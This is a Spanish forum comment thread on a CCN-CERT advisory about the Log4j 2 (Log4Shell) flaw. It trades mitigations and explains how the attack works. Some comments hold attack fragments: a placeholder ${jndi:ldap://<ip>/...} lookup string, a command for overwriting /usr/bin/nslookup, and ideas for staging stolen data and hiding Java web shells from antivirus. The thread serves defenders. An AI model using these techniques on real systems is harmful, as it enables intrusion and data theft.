Menéame: comentarios [3595568]

#55 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

el-brujo — Tue, 14 Dec 2021 21:52:16 +0000

#54 CloudFlare ya detectó ataques de la vulnerabilidad 9 días antes de hacerse pública.....
Fuente:
twitter.com/eastdakota/status/1469800951351427073

» autor: el-brujo

#54 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

maloconocido — Tue, 14 Dec 2021 19:48:18 +0000

#1 y los que ya habrían caído sin saberlo años antes...

» autor: maloconocido

#53 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

xkill — Tue, 14 Dec 2021 15:30:00 +0000

#35 si tienes toda la razón, pero de ahí a aconsejar que antes que filtrar en la entrada lo hagan en la salida.... Porque vamos que poner una web Shell es facilísimo y no hace falta que el servidor tenga conexión. Es más, al cargar en memoria la clase de Java puedes cargar en memoria la webshell y eso ya es más jodido de pillar.
Los C2 que hagan conexiones inversas muy bien, pero como no soluciones el problema poco vas a hacer

Edit: mira qué fácil: duckduckgo.com/?q=java+class+web+shell+github
Y nada te lo curras un poco más (o menos) y haces una webshell a mano para saltarte las firmas del AV

» autor: xkill

#52 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 15:03:39 +0000

#51 Quiza cuando haya pasado un tiempo prepare un articulo explicando todos los detalles de esta vulnerabilidad

» autor: alvdavi

#51 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

nodanero — Tue, 14 Dec 2021 12:32:23 +0000

#48 Gracias por la explicación. Ya veo que en este caso se esta utilizando LDAP y para eso se necesita un servidor en remoto. Veo que hay otros como HTTP, RMI, DNS y BeanFactory, me intriga saber hasta que punto se podria explotar JNDI XBean pero no soy desarrollador y es mas bien curiosidad, asi que me esperare a ver como se va la cosa.

» autor: nodanero

#50 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--37472-- — Tue, 14 Dec 2021 11:57:56 +0000

[Usuario deshabilitado]

» autor: --37472--

#49 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

warheart — Tue, 14 Dec 2021 11:43:24 +0000

#47 como si no hubiera más opciones. Conozco unos cuantos casos con slf4j + logback que están bastante tranquilos.

» autor: warheart

#48 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 11:36:14 +0000

#45 para añadir más detalle, aunque es muy cómodo montar un servidor ldap que genere comandos dinámicos, tiene el inconveniente (o más bien ventaja para el pobre que está intentando paliar el problema)de dejar un rastro claro en el log de los comandos que se ejecutaron

» autor: alvdavi

#47 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

wai — Tue, 14 Dec 2021 11:35:37 +0000

#16 Si usa java y no usa log4j su problema es mucho mayor que este problemilla de seguridad.

» autor: wai

#46 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

Drazul — Tue, 14 Dec 2021 11:27:15 +0000

#36 lo que se pide bloquear no es "devolver" la conexión. Lo que se pide es no poder iniciar una conexión desde el servidor hacia Internet.

» autor: Drazul

#45 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 11:26:43 +0000

#42 vale, acabo de leer hasta el final y creo que he encontrado lo que puede haberte llevado a confusión. Muestran logs donde se ve algo parecido a ${jndi:ldap://<ip>/<comando_en_base64>}.

Lo que ocurre en este caso no es que el servidor ejecute directamente el comando en base 64 que está ahí, sino que alguien ha creado un servidor ldap en <ip> que cuando le preguntas por <comando_en_base64> El servidor ldap responde con un exploit generado dinámicamente para ejecutar ese comando. Pero la máquina atacada sigue teniendo que conectar a ldap://<ip>/<comando_en_base64> y descargar el exploit.

» autor: alvdavi

#44 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

lolerman — Tue, 14 Dec 2021 11:21:53 +0000

Es que Java no va a morir nunca... seguirá dando por saco eternamente.

» autor: lolerman

#43 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 11:16:30 +0000

#42 sacado de tu enlace:

By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload.

» autor: alvdavi

#42 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

nodanero — Tue, 14 Dec 2021 11:12:32 +0000

#40 Claro. unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

Aqui muestran en el ejemplo, alguna peticion del escaneo masivo. Estas peticiones llevan un User-Agent modificado en el que esta embebido un comando (curl,wget,bash).
Lo que yo entiendo es que esa peticion podria llevar cualquier otro User-Agent con el comando que el atacante quisiera, como el del ejemplo que puse al principio. Se podria pasar una payload a base de peticiones HTTP sin tener que conectarse a un servidor remoto para descargar (a diferencia del ejemplo de Palo Alto).

» autor: nodanero

#41 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 11:09:47 +0000

#32 puedo confirmar que esta mitigación, aunque pueda sonar un poco salvaje, es válida. Eso si, requiere reiniciar el servicio

» autor: alvdavi

#40 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 11:06:21 +0000

#37 creo que puedo decir sin miedo a equivocarme que conozco esta vulnerabilidad extremadamente bien, y no funciona como dices. Si tienes el enlace, puedo echar un vistazo, ver exactamente qué comentan, pero estoy convencido que hablan de la vulnerabilidad de ejecución remota que todos conocemos

» autor: alvdavi

#39 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--587023-- — Tue, 14 Dec 2021 11:04:10 +0000

[Usuario deshabilitado]

» autor: --587023--

#38 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

hynreck — Tue, 14 Dec 2021 10:59:48 +0000

#36 Tu te conectas a un servidor web y le dices "GET" o "PUT" el servidor web no se conecta a tu equipo, la pagina "te la traes" tu (tu navegador)

» autor: hynreck

#37 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

nodanero — Tue, 14 Dec 2021 10:58:23 +0000

#34 No. Puedes ver el ejemplo en la web de Palo Alto, donde muestran la peticion al servidor, y el comando incluido en ella. En ese ejemplo enseñan concatenado "curl", "wget", "bash" pero podria haber sido cualquier otro.

» autor: nodanero

#36 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

paragomba — Tue, 14 Dec 2021 10:58:14 +0000

#6 ¿como que un servidor web no necesita devolver la conexion?¿Como hace entonces para que la pagina llegue a tu navegador?
Se pueden cerrar los servicios y puertos no necesarios, poner un firewall que filtre el trafico entrante, un firewall a nivel de aplicacion que corte la conexion si la web intenta hacer cosas raras ... pero dejar un servidor web sin salida a internet no tiene sentido.

» autor: paragomba

#35 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--652706-- — Tue, 14 Dec 2021 10:57:18 +0000

#11 Esto... si tengo un ecommerce tengo q tener la entrada HTTP/HTTPS abierta a cualquiera que quiera comprarme (aunque siempre se puede limitar por país de origen o por reputación de IP para controlar un poco).

Pero mi servidor web no tiene porqué tener salida a Internet por si mismo, más que a aquello que necesite.
#3 Veo que #6 lo ha explicado mejor que yo

#24 Obviamente no hay solución mágica (o dejaríamos de cobrar a final de mes ) pero como 'la moda' es usar sistemas modulares donde una vez tomas control del servidor te descargas los módulos que necesites... con un buen control de tráfico saliente limitarías muchos ataques.

Aunque es más fácil decir que hacer

» autor: --652706--

#34 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:51:59 +0000

#24 para invocar otros comandos este ataque primero tiene que hacer que la máquina atacada se conecte a un servidor remoto

» autor: alvdavi

#33 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

pendejo1983 — Tue, 14 Dec 2021 10:50:29 +0000

#31 gracias

» autor: pendejo1983

#32 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

snowdenknows — Tue, 14 Dec 2021 10:43:47 +0000

Aquí otra mitigación sencilla, básicamente cargarse la clase JndiLookup del jar github.com/zhangyoufu/log4j2-without-jndi/blob/master/README_en.md

» autor: snowdenknows

#31 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:43:15 +0000

#29 imagino que Tomcat tendrá algún lugar donde se configuran los parámetros de arranque, pero personalmente no he trabajado nunca con tomcat, no sabría decirte donde es

» autor: alvdavi

#30 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:41:17 +0000

#28 como te digo, no es que no funcione en 7, es mas que no hemos tenido tiempo de probarlo, ya que no publicamos binarios de Corretto basados en OpenJDK7. Así de cabeza no se me ocurre por que no iba a funcionar en 7. Si es importante para vosotros, prueba en una máquina de desarrollo

» autor: alvdavi

#29 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

pendejo1983 — Tue, 14 Dec 2021 10:39:25 +0000

#27 pero la arranca Apache Tomcat, no? Pensaba que sería algo a modificar en algún fichero de configuración

» autor: pendejo1983

#28 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

infestissumam — Tue, 14 Dec 2021 10:34:39 +0000

#16 #26 A eso me refería, si. Parece que este parche solo sirve para versiones superiores a JDK 1.8, nosotros tenemos JDK 1.7 en algunos servidores y log4j 1.15 no es compatible con JDK 1.7

» autor: infestissumam

#27 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:33:27 +0000

#22 son parámetros que pasas a la máquina virtual de Java al arrancar, después de java y antes de la clase que quieres que se ejecute (o antes de -jar si estas ejecutando un jar)

» autor: alvdavi

#26 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:30:51 +0000

#16 imagino que se refiere a si la utilidad (que funciona adjuntándose a la máquina virtual y redefiniendo el bytecode de JndiLookup::lookup) funciona con JDK1.7 o no, no si Log4Shell le afecta

» autor: alvdavi

#25 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:30:10 +0000

#21 cierto, gracias por el aporte.

la solución en #8 es para versiones de log4j entre 2.10 y 2.14.

» autor: --59291--

#24 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

nodanero — Tue, 14 Dec 2021 10:29:09 +0000

#2 Esto es importante de aplicar, pero no todos los ataques se enfocan en descargar codigo desde un servidor remoto.
Este ataque podria invocar otros comandos para crear por ejemplo un binario o un script ejecutable. Por ejemplo, reemplazando una utilidad del sistema ya tendria permisos de ejecucion.

Ejemplo: "echo "xyz" > /usr/bin/nslookup", concatenando lineas hasta que el binario esta completado.
El binario podria tener como funcionalidad capturar credenciales a bases de datos, escaneo de puertos, coleccion de certificados privados etc.

Enviar trafico al exterior en ciertos escenarios es posible yendo encapsulado con DNS u otro trafico, o a traves de otro nodo. Pero siendo un servidor web, podrias recopilar los datos en un archivo o varios en el directorio web y despues descargarlos llamando la URL.

» autor: nodanero

#23 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:27:36 +0000

#8 #12 para casos como los que mencionáis es para lo que vale la utilidad de parcheo en caliente que se menciona más arriba

» autor: alvdavi

#22 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

pendejo1983 — Tue, 14 Dec 2021 10:26:41 +0000

#8 dónde las configuras?

» autor: pendejo1983

#21 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:25:50 +0000

#8 la propiedad clave, log4j2.formatMsgNoLookups, se añadió en log4j 2.10. Si usas una versión anterior poner la propiedad no tendrá ningún efecto y seguiréis siendo vulnerables

» autor: alvdavi

#20 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:23:07 +0000

#4 un pequeño recordatorio, el parche no persiste si se reinicia la máquina virtual. Es posible aplicar el parche en modo agente pasando un parámetro a la hora de arrancar, pero si vas a parar la máquina y puedes, la recomendación es actualizar log4j

» autor: alvdavi

#19 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:22:19 +0000

#18 Wazuh es tu amigo.

» autor: --59291--

#18 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

eldarel — Tue, 14 Dec 2021 10:21:53 +0000

#10 La de veces que me dicen yo lo tengo todo actualizado y estoy migrando lo que no...
Luego, le suelto lo de vamos ha hacer inventario y

» autor: eldarel

#17 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

alvdavi — Tue, 14 Dec 2021 10:20:56 +0000

#14 Hemos probado la utilidad en 8, 11 y 15. Cuando tengamos algo de tiempo subiremos la versión que soporta 17 en caliente, ya que la que hay ahora en github para 17 solo funciona en modo agente.

No se me ocurre un motivo por el que no vaya a funcionar en 7, pero no la hemos probado

» autor: alvdavi

#16 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:20:34 +0000

#14 a ver, si usas Java, pero por alguna razón no usas log4j da igual. Aquí el problema es usar log4j inferior a 2.15.0. Entonces esas opciones te debería valer.

» autor: --59291--

#15 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

xkill — Tue, 14 Dec 2021 10:17:18 +0000

#13 hasta que caiga media empresa, todos los equipos cifrados,... y se vea claramente que fue por no parchear está vulnerabilidad.
A lo mejor se encargan hasta de robarle las cuentas del banco o publicar su sueldo...

» autor: xkill

#14 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

infestissumam — Tue, 14 Dec 2021 10:15:44 +0000

#4 ¿Sirve para todas las versiones de java, incluso JDK 1.7?

» autor: infestissumam

#13 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:11:10 +0000

#12 todo por correo/escrito. 2ª ley del DevOps

Y cuando el responsable de que no se pueda parchear es el CTO, poco puedes hacer.

» autor: --59291--

#12 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

xkill — Tue, 14 Dec 2021 10:10:21 +0000

#8 si por lo que sea no podéis parchear: ir mirando qué problema político/humano hay detrás, puede que lo mejor sea no hacer nada. El responsable de que no se pueda parchear no tardará en caer, pero intenta que quede constancia de quién es el responsable de que no se pueda parchear.

» autor: xkill

#11 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

xkill — Tue, 14 Dec 2021 10:07:58 +0000

#2 eso eso, tu aplica listas a la salida, y deja la entrada libre.... Ya verás que risas!

» autor: xkill

#10 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:03:57 +0000

#9 O que no se actualizan porque negocio no quiere dedicar recursos o sacar personal de otros equipos para solucionar algo que "ya funciona correctamente" o que no da dinero, o ninguna ventaja sobre la competencia.

Eso es asi.

» autor: --59291--

#9 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

Pablosky — Tue, 14 Dec 2021 10:02:35 +0000

#5 Sobre todo esas versiones del año catapún que no actualiza nadie, "¿paque?", si esto lo tenemos en la red interna tras el firewall.

» autor: Pablosky

#8 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 10:01:22 +0000

Asimismo, si por lo que sea no podéis parchear. Estas dos propiedades de Java os deberían salvar el culo:

-Dlog4j2.disable.jmx=true -Dlog4j2.formatMsgNoLookups=true

» autor: --59291--

#7 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

heffeque — Tue, 14 Dec 2021 09:57:13 +0000

#4 ¡Muy grande la aportación!

» autor: heffeque

#6 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

hynreck — Tue, 14 Dec 2021 09:57:02 +0000

#3 No, se refiere a salida.. un servidor web normalmente no tiene por que tener salida sin filtrar a internet este exploit fuerza a que el servidor web se conecte a un host remoto y ejecute el programa allí alojado, si no hay salida a internet no podrá (y un servidor web solo necesita que el cliente llegue a el, no devolver la conexión)

» autor: hynreck

#5 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--59291-- — Tue, 14 Dec 2021 09:55:58 +0000

Acordaos de Elasticsearch...

» autor: --59291--

#4 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--587023-- — Tue, 14 Dec 2021 09:55:00 +0000

[Usuario deshabilitado]

» autor: --587023--

#3 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

SergioZgz — Tue, 14 Dec 2021 09:53:22 +0000

#2 yo lo entiendo como el trafico entrante no el saliente (pero vamos que el concepto esta claro)

» autor: SergioZgz

#2 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

--652706-- — Tue, 14 Dec 2021 09:45:15 +0000

Aplicar listas blancas en la salida de internet en caso de duda de estar usando la librería log4j
Creo que este consejo es el que te puede salvar de más 0-day.

"Da igual" si tu servidor es vulnerable, si no puede descargarse el código malicioso porque simplemente no puede conectarse al exterior.
Sea esta vulnerabilidad o cualquier otra q aparezca mañana

Obviamente... a actualizar lo antes posible, pero controlar el tráfico saliente de los servidores accesibles desde Internet debería estar en las prioridades de los administradores

» autor: --652706--

#1 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]

Dene — Tue, 14 Dec 2021 08:38:02 +0000

La de servidores que van a caer con esta vulnerabilidad.....

» autor: Dene